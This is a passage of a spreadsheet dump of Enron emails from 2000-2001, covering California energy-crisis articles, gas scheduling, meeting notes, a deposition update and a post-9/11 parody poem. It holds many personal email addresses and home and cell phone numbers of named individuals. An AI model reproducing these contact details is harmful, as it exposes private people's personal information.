to the alternative facilities and contracts signed by the state were going to _x000D_
cost more than originally planned. _x000D_
That eats up some of the headroom and "is indicative of a rate increase," _x000D_
Danforth said. _x000D_
Paying the Bill _x000D_
Most of what PG&amp;E customers pay for electricity is spoken for but the demands _x000D_
are about to get a lot bigger. . _x000D_
Breakdown of contributors to electricity production _x000D_
PG&amp;E generated power -- What the utility produces at its own plants. _x000D_
Alternative energy -- Electricity generated by solar, wind and biomass _x000D_
companies. _x000D_
Independent generators -- Power produced at non-PG&amp;E plants in California and _x000D_
elsewhere. . _x000D_
PG&amp;E customers currently pay 6.5 cents per kilowatt hour _x000D_
Combined sources of electricity cost 6.134 cents per kilowatt hour _x000D_
This portion represents 0.366 cents of leftover money . _x000D_
Claims on leftover money _x000D_
-- Money owed to the Independent System Operator, which has been forced to _x000D_
buy electricity at very high prices in recent months. _x000D_
-- Money owed to the alternative energy providers. Many of these small units _x000D_
have stopped operating because they have not been paid. _x000D_
-- Emergency power purchases likely to be necessary this summer, since the _x000D_
state has not secured enough long-term contracts to provide all the power it _x000D_
needs. That could drain either the state's coffers, or be paid for by _x000D_
consumers. . _x000D_
Source: Chronicle research Chronicle Graphic _x000D_
E-mail the reporters at rsalladay@sfchronicle.com and _x000D_
lgledhill@sfchronicle.com. _x000D_
,2001 San Francisco Chronicle ? Page?A - 1 </t>
  </si>
  <si>
    <t>Fri, 26 Jan 2001 06:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">I'm not sure what contract this falls under. Our contract says that if buyer  _x000D_
does not schedule then buyer will pay  replacement price differential plus _x000D_
$.15.  Rpalcement price differnetial would be gas daily which was around _x000D_
16.80 on that day.  </t>
  </si>
  <si>
    <t>Fri, 15 Dec 2000 07:22:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dave.scott@enron.com', 'jeffrey.porter@enron.com'})</t>
  </si>
  <si>
    <t>CGAS volumes</t>
  </si>
  <si>
    <t xml:space="preserve">Attached are my calculations of the IF volumes for CGAS.  I will also try to _x000D_
update this schedule for the AGL production area volumes.  _x000D_
_x000D_
I have also included the CGAS NX1 deals.  I feel good about the NX1 volumes _x000D_
for Jan and Feb, I not sure about the Mar forward volumes yet.  I will keep _x000D_
working on thei sheet._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 18 Oct 2000 01:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ttran20@hotmail.com', 'lxtran@yahoo.com', 'clukawski@hitt-gc.com', 'aa_4@yahoo.com', 'kbrafman@hotmail.com', 'marc.albero@eddy.foamex.com', 'jpenney@hollandlessard.com', 'jrogers@tullib.com', 'dmahoney@tularik.com', 'petromega@aol.com', 'jpgiles@hotmail.com', 'reedbohner@aol.com', 'csdaulat@hotmail.com', 'mikedogum@aol.com', 'lgranozio@aol.com', 'jverre99@hotmail.com', 'ptrintis@cs.com', 'bwycall@hotmail.com', 'billmagee@mindspring.com', 'dhickey@archmereacademy.com', 'noose911@aol.com', 'jbukzin@christianacare.org', 'dtaub1@aol.com', 'longovin@cs.com', 'pvdds@aol.com', 'benjamin.rogers@enron.com', 'bhickey@cmiprint.com', 'sean.healy@thetowndock.com'})</t>
  </si>
  <si>
    <t>Fwd: FW: FW: Seminoles</t>
  </si>
  <si>
    <t>From: "Chetan Daulat" &lt;csdaulat@hotmail.com&gt;_x000D_
To: barryprosth@yahoo.com_x000D_
CC: wendys123@hotmail.com, dgioffre@hotmail.com, Pallav.Raval@Walgreens.com,_x000D_
lance@gr8.com, whorich@hotmail.com_x000D_
Subject: Fwd: FW: FW: Seminoles_x000D_
Date: Tue, 17 Oct 2000 14:51:01 EDT_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&gt;From: "Chris Liang" &lt;cliang@bu.edu&gt;_x000D_
&gt;To: "Jorge Matos" &lt;wirebender@hotmail.com&gt;,        "Shane Black"_x000D_
&gt;&lt;smbblack@hotmail.com&gt;,        "Nathaniel Scripture"_x000D_
&gt;&lt;nscripture@hotmail.com&gt;,        "Luis Torres" &lt;ltorres@bdo.com&gt;, "David_x000D_
&gt;Hummel" &lt;drteeth66@aol.com&gt;,        "Daniel Ma" &lt;dmortho@hotmail.com&gt;,_x000D_
&gt;"David Ingram" &lt;di19@umail.umd.edu&gt;,        "Chet Daulat"_x000D_
&gt;&lt;csdaulat@hotmail.com&gt;,        "Brian Liang" &lt;btliang@hotmail.com&gt;,_x000D_
&gt;"Larry Chen" &lt;bigfatlar@hotmail.com&gt;,        "Brian Carter"_x000D_
&gt;&lt;bcarterdds@email.msn.com&gt;_x000D_
&gt;Subject: FW: FW: Seminoles_x000D_
&gt;Date: Tue, 17 Oct 2000 00:12:35 -0400_x000D_
&gt;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nole cheerleader.jpg</t>
  </si>
  <si>
    <t>Wed, 29 Nov 2000 05:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sarah.novosel@enron.com', 'skean@enrron.com', 'alan.comnes@enron.com', 'mpalmer@enron.com', 'mary.hain@enron.com', 'mona.petrochko@enron.com', 'james.steffes@enron.com', 'richard.shapiro@enron.com', 'karen.denne@enron.com', 'paul.kaufman@enron.com', 'susan.mara@enron.com', 'joe.hartsoe@enron.com'})</t>
  </si>
  <si>
    <t>Dan Walters' article from the Sacramento Bee, November 26, 2000.</t>
  </si>
  <si>
    <t>----- Forwarded by Jeff Dasovich/NA/Enron on 11/29/2000 01:54 PM -----_x000D_
_x000D_
	Joseph Alamo_x000D_
	11/29/2000 01:11 PM_x000D_
		 _x000D_
		 To: Sandra McCubbin/NA/Enron, Jeff Dasovich/NA/Enron_x000D_
		 cc: _x000D_
		 Subject: Dan Walters' article from the Sacramento Bee, November 26, 2000._x000D_
_x000D_
_x000D_
Copyright , The Sacramento Bee_x000D_
_x000D_
Dan Walters: A power crisis imperils Davis_x000D_
(Published Nov. 26, 2000) _x000D_
Gov. Gray Davis would appear to be living a charmed political life. _x000D_
California's economy is soaring, the state's tax coffers -- and Davis' own _x000D_
re-election treasury -- are bulging, voters are in a complacent mood, and _x000D_
there have been none of the devastating disasters that plagued the state _x000D_
during the early 1990s. _x000D_
There is, however, a very dark cloud casting a shadow over Davis' _x000D_
governorship: the prospect of rolling blackouts as demand for electric power _x000D_
exceeds supply, accompanied by tremendous increases in Californians' power _x000D_
bills. And how Davis handles this incipient crisis could be the hallmark of _x000D_
his first term -- and, potentially, a re-election issue in 2002. _x000D_
San Diego utility customers were hit hard last summer as their local utility _x000D_
emerged from the mandatory rate freeze imposed by the state's 1996 utility _x000D_
deregulation scheme. Davis and the Legislature responded, in effect, by _x000D_
buying some time. They enacted legislation rolling back power bills _x000D_
temporarily, but leaving it unclear whether ratepayers, taxpayers, San Diego _x000D_
Gas and Electric Co. or power suppliers would eventually eat the wholesale _x000D_
costs that led to the spikes. _x000D_
Clearly, Davis was hoping that the Federal Energy Regulatory Commission _x000D_
(FERC) would step in and force the suppliers to refund hundreds of millions _x000D_
of dollars to SDG&amp;E and its ratepayers. And that, Davis and other politicians _x000D_
hoped, would also forestall a similar, but much larger crisis looming for _x000D_
customers of Southern California Edison and Pacific Gas and Electric Co., the _x000D_
state's two largest private utilities. The two are still operating under the _x000D_
rate freeze, but have acquired at least $5 billion in unanticipated wholesale _x000D_
power costs that they want to pass on to their ratepayers. _x000D_
Politically, FERC intervention would be the most palatable of the _x000D_
alternatives because it would place the financial onus on mostly out-of-state _x000D_
corporations that have little political standing. California politicians have _x000D_
been demonizing the power suppliers, saying they took advantage of the _x000D_
deregulation program's auction process to drive up costs far beyond reason. _x000D_
The problem for Davis and others is that FERC is not cooperating, pointedly _x000D_
refusing to intervene in a way that the governor wanted. Davis ripped into _x000D_
the FERC response during a hearing earlier this month, accusing it of _x000D_
"gutting (California's) ability to protect consumers" and proposing "new and _x000D_
completely untried market rules, making guinea pigs of California consumers _x000D_
in yet another reckless deregulation experiment." _x000D_
Davis wants to appoint himself as the California utility customer's best _x000D_
friend, hinting that he may lead a "ratepayer revolt" if FERC continues to _x000D_
refuse to order refunds from suppliers and new price controls. But it's _x000D_
unclear what he can do concretely, since he's on record as approving the _x000D_
overall thrust of deregulation and since many of the business interests he _x000D_
has cultivated to obtain his re-election funds have benefited from having _x000D_
power suppliers compete for their business. _x000D_
Doing nothing could mean that when Southern California Edison and PG&amp;E emerge _x000D_
from the rate freeze, they will raise rates dramatically, just as Davis is _x000D_
seeking re-election in 2002. _x000D_
The utilities seem to be offering Davis a deal: allow them to begin raising _x000D_
rates now to recover their "stranded costs" for wholesale power and they will _x000D_
avoid sticker-shock raises in 2002. _x000D_
Another option would be for Davis to spend some of the state's billions of _x000D_
surplus dollars to either ease the impact on ratepayers or put the state into _x000D_
the power supply business itself. _x000D_
The only certainty is that unless FERC reverses itself, Davis will remain on _x000D_
the hook for whatever happens -- the sort of unpredictable situation that he _x000D_
hates to encounter. _x000D_
DAN WALTERS' column appears daily except Saturday. Mail: P.O. Box 15779, _x000D_
Sacramento, 95852; phone: (916) 321-1195; fax: (916) 444-7838; e-mail: _x000D_
dwalters@sacbee.com</t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 11:21:27 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'neil.davies@enron.com', 'pierre.aury@enron.com', 'george.mcclellan@enron.com', 'david.leboe@enron.com', 'sally.beck@enron.com', 'stuart.staley@enron.com', 'l..nowlan@enron.com', 'chris.mahoney@enron.com', 'gary.hickerson@enron.com', 'cindy.skinner@enron.com', 'lisa.yoho@enron.com', 'shanna.funkhouser@enron.com', 'beth.perlman@enron.com', 'scott.tholan@enron.com', 'per.sekse@enron.com', 'mark.frevert@enron.com', 'rick.bergsieker@enron.com', 'j.kaminski@enron.com', 'a..price@enron.com', 'thomas.myers@enron.com', 'mike.mcconnell@enron.com', 'doug.arnell@enron.com', 'mark.tawney@enron.com', 'larry.lawyer@enron.com', 'h..douglas@enron.com', 'a..shankman@enron.com', 'alan.aronowitz@enron.com', 'eric.gonzales@enron.com', 'jennifer.fraser@enron.com', 'daniel.reck@enron.com'})</t>
  </si>
  <si>
    <t>EGM Weekly Staff Meeting - Reminder</t>
  </si>
  <si>
    <t>_x000D_
Just a reminder that the EGM weekly staff meeting will take place on Monday, June 11th, from 8:30 - 9:30 a.m., in video conference room EB 32C2.  The staff meetings will continue on a weekly basis on every Monday at the same time and location unless notified otherwise._x000D_
_x000D_
Please let me know if you are unable to attend.  Thank you._x000D_
_x000D_
Cathy Phillips_x000D_
X-36898</t>
  </si>
  <si>
    <t>Fri, 11 May 2001 07:10:19 -0700 (PDT)</t>
  </si>
  <si>
    <t>E-mail</t>
  </si>
  <si>
    <t>John,_x000D_
_x000D_
The adddress that works is Vince.J. Kaminski@enron.com_x000D_
_x000D_
_x000D_
Vince</t>
  </si>
  <si>
    <t>Wed, 12 Dec 2001 19:03:15 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kathy.sturr@enron.com'})</t>
  </si>
  <si>
    <t>RE: Enron Kids</t>
  </si>
  <si>
    <t>I'll also need copies of your receipts for the Treasurer.  thx._x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Sturr, Kathy  _x000D_
Sent:	Wednesday, December 12, 2001 10:43 AM_x000D_
To:	Hyatt, Kevin_x000D_
Subject:	Enron Kids_x000D_
_x000D_
Kevin,_x000D_
_x000D_
You owe me $255.90 for the 3 children that I shopped for._x000D_
_x000D_
If you want you can bring me the labels and pick up the bags.  _x000D_
_x000D_
Kathy</t>
  </si>
  <si>
    <t>Mon, 6 Aug 2001 10:43:10 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'michael.seely@enron.com'})</t>
  </si>
  <si>
    <t>Mike come on up at 5:30 a.m.  _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Seely, Michael  _x000D_
Sent:	Monday, August 06, 2001 11:20 AM_x000D_
To:	Hernandez, Juan; Will, Lloyd_x000D_
Subject:	_x000D_
_x000D_
Lloyd / Juan_x000D_
_x000D_
I have confirmed with my current boss that I will be available to start with you guys on Aug. 13.  Let me know if there is anything I need to do prior to that date.  Please let me know what time I need to show up next Monday.  Thanks, and I look forward to working with you._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Michael Seely_x000D_
Global Wholesale Markets_x000D_
Enron Broadband Services_x000D_
EB4456E_x000D_
Direct - 713 853-1404_x000D_
Cell - 713 775-6463_x000D_
Fax - 713 646-8795_x000D_
Michael_Seely@enron.net</t>
  </si>
  <si>
    <t>Fri, 23 Jun 2000 08:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'heidi.griffith@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'gloria.barkowsky@enron.com', 'lashanda.poledore@enron.com', 'wade.price@enron.com', 'mary.franklin@enron.com', 'john.singer@enron.com', 'chris.germany@enron.com'})</t>
  </si>
  <si>
    <t>Commonwealth-New Meters</t>
  </si>
  <si>
    <t>FYI.  Commonwealth is adding five new meters to their existing contract.  _x000D_
These meters (4137901, 4132101, 4235001, 4134301, and 4132201) are all at _x000D_
Bridgeport and are expected to produce about 75 dths a day.  These meters are _x000D_
expected to come on for the 7/00 production period.  If anyone has any _x000D_
questions, please contact Jim (614) 791-6107._x000D_
_x000D_
Thanks,_x000D_
Heidi</t>
  </si>
  <si>
    <t>Mon, 27 Nov 2000 17:06:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Max Holmes Deposition-Day No. 1</t>
  </si>
  <si>
    <t>Richard: _x000D_
_x000D_
It was another great deposition day for the plaintiffs.? The high point was _x000D_
an audio taped phone conversation of Max Holmes' calling Stickler a liar.? A _x000D_
more detailed report is attached._x000D_
_x000D_
Frankly, I don't think McDonald and NatWest can let this case go to trial.? _x000D_
They will almost surely lose, and lose big, and PaineWebber could be drawn in _x000D_
too.? I think I will make a renewed pitch to Bruce MacLeod (Farallon's lawyer _x000D_
here this week) to let ECT out.? I will keep you posted._x000D_
_x000D_
Steve _x000D_
_x000D_
 &lt;&lt;depsum11.27&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depsum11.27</t>
  </si>
  <si>
    <t>Mon, 6 Nov 2000 02:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'savont@email.msn.com'})</t>
  </si>
  <si>
    <t>frozenset({'klay@enron.com', 'd.carlson@mail.house.gov', 'jordancapitalmanagement@worldnet.att.net', 'bmiller@hillcopartners.com'})</t>
  </si>
  <si>
    <t>Fw: Timeline Charts for arena vote</t>
  </si>
  <si>
    <t>Here are our final tracking results. Our last day was Sunday._x000D_
_x000D_
Dave Walden_x000D_
----- Original Message -----_x000D_
From: Michael D. Baselice &lt;mikeb@baselice.com&gt;_x000D_
To: George Postolos (E-mail) &lt;georgep@rocketball.com&gt;; Angela Blakeney_x000D_
(E-mail) &lt;angelab@rocketball.com&gt;; Dave Walden (E-mail) &lt;savont@msn.com&gt;;_x000D_
Glenn Smith (E-mail) &lt;gsmith@pstrategies.com&gt;; Dale Laine (E-mail)_x000D_
&lt;dlaine@pstrategies.com&gt;_x000D_
Sent: Monday, November 06, 2000 9:27 AM_x000D_
Subject: Timeline Charts_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
MICHAEL BASELICE_x000D_
Baselice &amp; Associates, Inc._x000D_
4131 Spicewood Springs Road_x000D_
Suite O-2_x000D_
Austin, TX  78759_x000D_
Phone: (512) 345-9720_x000D_
Fax: (512) 345-9740_x000D_
email: mikeb@baselice.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - 290NOV5.ppt</t>
  </si>
  <si>
    <t>Mon, 8 Oct 2001 10:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'alex.a.molinaroli@jci.com'})</t>
  </si>
  <si>
    <t>meeting</t>
  </si>
  <si>
    <t>_x000D_
Alex,_x000D_
_x000D_
sorry we keep missing each other.  i understand you are out of the country this week.  give me a call when you get a chance.  you can reach me at any of the following numbers_x000D_
_x000D_
work  713-853-5220_x000D_
cell   713-992-0660_x000D_
home 713-465-1641_x000D_
_x000D_
i look forward to hearig from you._x000D_
_x000D_
_x000D_
Greg</t>
  </si>
  <si>
    <t>Tue, 20 Mar 2001 09:32:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'brian.hendon@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">I couldn't have said it better myself.  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Brian Hendon@ENRON COMMUNICATIONS_x000D_
	03/20/2001 01:41 PM_x000D_
		 _x000D_
		 To: Gerald Nemec/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"There's nothing wrong with letting the girls know that you're money and that _x000D_
you want to party." _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 26 Apr 2001 20:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/27/01; HourAhead hour: 4;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t>Start Date: 4/27/01; HourAhead hour: 4;  No ancillary schedules awarded.  No _x000D_
variances detected._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001042704.txt</t>
  </si>
  <si>
    <t>Wed, 17 Oct 2001 08:28:22 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
_x000D_
Chris Foster_x000D_
chris.h.foster@enron.com_x000D_
(W) 503/464-3822_x000D_
(Cell) 503/702-8568</t>
  </si>
  <si>
    <t>Thu, 28 Dec 2000 03:22:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: TVA</t>
  </si>
  <si>
    <t>Janet, I believe a current board member is likely to be picked - last I heard _x000D_
the mayor of Tupelo.  Craven will be in office until May._x000D_
_x000D_
Regards_x000D_
Delainey</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 09:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>TCPL</t>
  </si>
  <si>
    <t>Dennis M and Hal K will send a fax to Stan this afternoon (3pm) regarding Enron's interests in NBP.  Might include proposals wrt Alaska._x000D_
--------------------------_x000D_
Sent from my BlackBerry Wireless Handheld (www.BlackBerry.net)</t>
  </si>
  <si>
    <t>Sun, 21 Jan 2001 08:24:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Summary of Proposed Short-term Solution for California's Energy_x000D_
 Crisis</t>
  </si>
  <si>
    <t xml:space="preserve">I think there is merit in pursuing this.  A couple of comments:_x000D_
It may be unduly complicated to get customers to provide the funding. =20_x000D_
Perhaps we should focus on the banks instead.  The deal might be further=20_x000D_
funding in exchange for legislative and regulatory concessions on rates,=20_x000D_
transmission and generation siting and the rest of the items you outline._x000D_
Rubin would be great to have, but having watched Summers in action I'm not=_x000D_
=20_x000D_
sure we need another ex-treas.  Summers is superb, up-to-speed, and=20_x000D_
apparently willing to work on this.  Linda -- how would Larry feel if we=20_x000D_
brought in his ex-boss (I know they're buddies but does Summers really need=_x000D_
=20_x000D_
the help?)._x000D_
Need to keep an eye on the ball for large customers-- many of whom are ours=_x000D_
. =20_x000D_
they will continue to need some access to better rates.  Perhaps the propos=_x000D_
al=20_x000D_
could be converted to cash in exchange for demand reductions._x000D_
_x000D_
_x000D_
_x000D_
=09Jeff Dasovich_x000D_
=09Sent by: Jeff Dasovich_x000D_
=0901/20/2001 10:54 PM_x000D_
=09=09=20_x000D_
=09=09 To: skean@enron.com, Richard Shapiro/NA/Enron@Enron, James D=20_x000D_
Steffes/NA/Enron@Enron, Sandra McCubbin/NA/Enron@Enron, Susan J=20_x000D_
Mara/NA/Enron@ENRON, Paul Kaufman/PDX/ECT@ECT, Linda Robertson/NA/Enron@ENR=_x000D_
ON_x000D_
=09=09 cc:=20_x000D_
=09=09 Subject: Summary of Proposed Short-term Solution for California's En=_x000D_
ergy=20_x000D_
Crisis_x000D_
_x000D_
_x000D_
----- Forwarded by Jeff Dasovich/NA/Enron on 01/20/2001 10:52 PM -----_x000D_
_x000D_
=09Jeff Dasovich_x000D_
=09Sent by: Jeff Dasovich_x000D_
=0901/20/2001 10:51 PM_x000D_
=09=09=20_x000D_
=09=09 To: tyson@haas.berkeley.edu, pverleger@compuserve.com_x000D_
=09=09 cc:=20_x000D_
=09=09 Subject: Summary of Proposed Short-term Solution for California's En=_x000D_
ergy=20_x000D_
Crisis_x000D_
_x000D_
Dean Tyson:_x000D_
_x000D_
It was a pleasure to see you again today. Phil, it was a pleasure to meet y=_x000D_
ou=20_x000D_
and I look forward to working together.  Since time is of the essence, I=20_x000D_
wanted to summarize where we left off at today=01,s meeting regarding Calif=_x000D_
ornia=01,_x000D_
s energy crisis.  That summary is attached.  I've also attached three=20_x000D_
articles from the business section of today's Chronicle that arguably bolst=_x000D_
er=20_x000D_
our arguments for adopting the approach that we discussed at today's meetin=_x000D_
g._x000D_
_x000D_
 Given the fact that the legislative process is moving rapidly, bankruptcy =_x000D_
is=20_x000D_
a daily threat, and Dean Tyson will be attending the meetings in Davos, it=_x000D_
=20_x000D_
appears that our window of opportunity is very small.  It seems that succes=_x000D_
s=20_x000D_
requires a meeting of the principals by the end of the week, if not sooner.=_x000D_
 =20_x000D_
The chances of success are obviously limited, but I think that we agreed th=_x000D_
at=20_x000D_
all concerned have nothing to lose and everything to gain by taking a shot.=_x000D_
=20_x000D_
Your offer to help in the effort obviously increases the likelihood of=20_x000D_
success and is greatly appreciated. =20_x000D_
_x000D_
My apologies in advance if I have mischaracterized any of the points made a=_x000D_
t=20_x000D_
the meeting.  It represents a =01&amp;first cut,=018 it will undoubtedly change=_x000D_
 as the=20_x000D_
details get worked out, and I=01,m sure I=01,ve missed something.  So pleas=_x000D_
e don=01,t=20_x000D_
hesitate to edit the draft._x000D_
_x000D_
Please keep in mind that I have not had a chance to discuss this proposal=_x000D_
=20_x000D_
internally.  As such, I can=01,t yet commit Enron to the specifics of the=_x000D_
=20_x000D_
proposal.  But I=01,m confident that the company can support something akin=_x000D_
 to=20_x000D_
this structure and can let you and Phil know first thing Monday._x000D_
_x000D_
In addition, given the political environment in California, Enron has playe=_x000D_
d=20_x000D_
a constructive role by providing low-key, behind the scenes advice and=20_x000D_
analysis to policy makers.  That approach seems preferable in this effort a=_x000D_
s=20_x000D_
well._x000D_
_x000D_
Finally, Dean Tyson, I mentioned that Linda Robertson heads-up our Washingt=_x000D_
on=20_x000D_
D.C. office.  If she can help in any way, please don=01,t hesitate to let m=_x000D_
e=20_x000D_
know.  Both of you should feel free to call me at home over the weekend to=_x000D_
=20_x000D_
discuss things further.  My home phone is 415.621.8317._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 1 Sep 2000 00:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Senate passes Alper/Davis Bill 30-0</t>
  </si>
  <si>
    <t xml:space="preserve">what does the siting bill provide for?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mona L Petrochko@EES_x000D_
08/29/2000 04:38 PM_x000D_
To: Douglas Condon/SFO/EES@EES, Martin Wenzel/SFO/HOU/EES@EES, James M _x000D_
Wood/HOU/EES@EES, Dennis Benevides/HOU/EES@EES, Greg Cordell, Roger Yang, _x000D_
Edward Hamb/HOU/EES@EES, Peggy Mahoney/HOU/EES@EES, Karen Denne@Enron, Mark _x000D_
Palmer/Corp/Enron@ENRON_x000D_
cc: James D Steffes/HOU/EES@EES, West GA, Richard Shapiro/HOU/EES@EES, Steven _x000D_
J Kean/NA/Enron@Enron, Mary Hain@Enron _x000D_
_x000D_
Subject: Senate passes Alper/Davis Bill 30-0_x000D_
_x000D_
AB 265 passed through the Senate a few minutes ago.  It now must go to the _x000D_
Assembly, where there is still a lot of uncertainty about what changes the _x000D_
Assembly will want to the bill.  We still haven't seen the latest _x000D_
"republican" language._x000D_
_x000D_
Also, AB 265 is double joined to AB 970, controversial siting bill.  To the _x000D_
extent one or the other fails, they both fail._x000D_
_x000D_
AB 265 (Davis/Alpert) has:_x000D_
_x000D_
1.  a 6.5 cent/kWh energy rate cap through 2002, with potential extension _x000D_
through 2003._x000D_
2.  Applicable to residential, small commercial (up to 100 kW)_x000D_
3.  Opt-in provision for large industrial/agricultural customers at 6.5 cents _x000D_
with an annual true-up_x000D_
4.  Use of revenues from utility generation assets (including PPA) to offset _x000D_
undercollections._x000D_
5.  Reasonableness review for San Diego G&amp;E_x000D_
_x000D_
Will update with more information as available._x000D_
_x000D_
No news about SCE._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 23 Sep 2001 12:01:11 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sandyteb@aol.com'})</t>
  </si>
  <si>
    <t>Fwd: The Binch  (Osama Bin Laden as The Binch)</t>
  </si>
  <si>
    <t xml:space="preserve">Received this from my friend Ann (Livergood) Baxter. Don't know its origins. _x000D_
Could be that she composed it. Anyway, I thought I'd send it along._x000D_
Sandy_x000D_
_x000D_
--------- Inline attachment follows ---------_x000D_
_x000D_
From:  &lt;abaxter@qwest.net&gt;_x000D_
Date: Sunday, September 23, 2001 5:02:36 GMT_x000D_
Subject: _x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
Every U down in Uville liked U.S. a lot, _x000D_
But the Binch, who lived Far East of Uville, did not. _x000D_
The Binch hated U.S.! The whole U.S. way! _x000D_
Now don't ask me why, for nobody can say, _x000D_
It could be his turban was screwed on too tight. _x000D_
Or the sun from the desert had beaten too bright_x000D_
But I think that the most likely reason of all _x000D_
May have been that his heart was two sizes too small. _x000D_
_x000D_
But, Whatever the reason, his heart or his turban, _x000D_
He stood facing Uville, the part that was urban. _x000D_
"They're doing their business," he snarled from his perch. _x000D_
"They're raising their families! They're going to church! _x000D_
They're leading the world, and their empire is thriving, _x000D_
I MUST keep the S's and U's from surviving!"_x000D_
_x000D_
Tomorrow, he knew, all the U's and the S's, _x000D_
Would put on their pants and their shirts and their dresses, _x000D_
They'd go to their offices, playgrounds and schools, _x000D_
And abide by their U and S values and rules._x000D_
_x000D_
And then they'd do something he liked least of all, _x000D_
Every U down in U-ville, the tall and the small, _x000D_
Would stand all united, each U and each S, _x000D_
And they'd sing Uville's anthem, "God bless us! God bless!" _x000D_
All around their Twin Towers of Uville, they'd stand, _x000D_
and their voices would drown every sound in the land._x000D_
_x000D_
"I must stop that singing," Binch said with a smirk, _x000D_
And he had an idea--an idea that might work! _x000D_
The Binch stole some U airplanes in U morning hours, _x000D_
And crashed them right into the Uville Twin Towers. _x000D_
"They'll wake to disaster!" he snickered, so sour, _x000D_
"And how can they sing when they can't find a tower?"_x000D_
_x000D_
The Binch cocked his ear as they woke from their sleeping, _x000D_
All set to enjoy their U-wailing and weeping, _x000D_
Instead he heard something that started quite low, _x000D_
And it built up quite slow, but it started to grow-- _x000D_
And the Binch heard the most unpredictable thing... _x000D_
And he couldn't believe it--they started to sing!_x000D_
_x000D_
He stared down at U-ville, not trusting his eyes, _x000D_
What he saw was a shocking, disgusting surprise! _x000D_
Every U down in U-ville, the tall and the small, _x000D_
Was singing! Without any towers at all! _x000D_
He HADN'T stopped U-Ville from singing! It sung!_x000D_
For down deep in the hearts of the old and the young, _x000D_
Those Twin Towers were standing, called Hope and called Pride, _x000D_
And you can't smash the towers we hold deep inside. _x000D_
_x000D_
So we circle the sites where our heroes did fall, _x000D_
With a hand in each hand of the tall and the small, _x000D_
And we mourn for our losses while knowing we'll cope, _x000D_
For we still have inside that U-Pride and U-Hope._x000D_
_x000D_
For America means a bit more than tall towers, _x000D_
It means more than wealth or political powers, _x000D_
It's more than our enemies ever could guess, _x000D_
So may God bless America! Bless us! God bless! </t>
  </si>
  <si>
    <t>Fri, 9 Mar 2001 01:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Steve,_x000D_
_x000D_
Attached is a rough draft proposed by Irwin Stelzer  for the Advisory Council _x000D_
meeting on April 10-11.  You will note that Gavyn is  on the agenda from 3:15 _x000D_
- 4:00 p.m.   I spoke with his assistant regarding the possibility of Gavyn _x000D_
departing on April 12 and was told that he has another commitment and will _x000D_
need to depart the Enron Building by 2:30 p.m. on April 11. _x000D_
_x000D_
Also, can you tell me if Prof. Joe Grundfest and Lawrence Kudlow are new _x000D_
members of the Advisory Council?  I would like to update our contact list._x000D_
_x000D_
Comments, please._x000D_
_x000D_
Vanessa_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 07:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'theresa.vos@enron.com'})</t>
  </si>
  <si>
    <t>Citibank's billing wire instructions</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Theresa,_x000D_
_x000D_
I'm not sure if Steve Thome mentioned this to you, but Enron is opening an _x000D_
escrow account in connection with a transaction with Delta Power.  He _x000D_
suggested that I forward the wiring instructions for the payment of the _x000D_
escrow fee of $10,500.  Please let me know what other info you need to tee _x000D_
this up._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 04/24/2001 02:13 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Lawrence, Estelle A" &lt;estelle.a.lawrence@citi.com&gt; on 04/24/2001 02:08:44 PM_x000D_
To: "'kay.mann@enron.com'" &lt;kay.mann@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Citibank's billing wire instructions_x000D_
_x000D_
Kay,_x000D_
_x000D_
As per Steve's request, please find below our wire instructions for the_x000D_
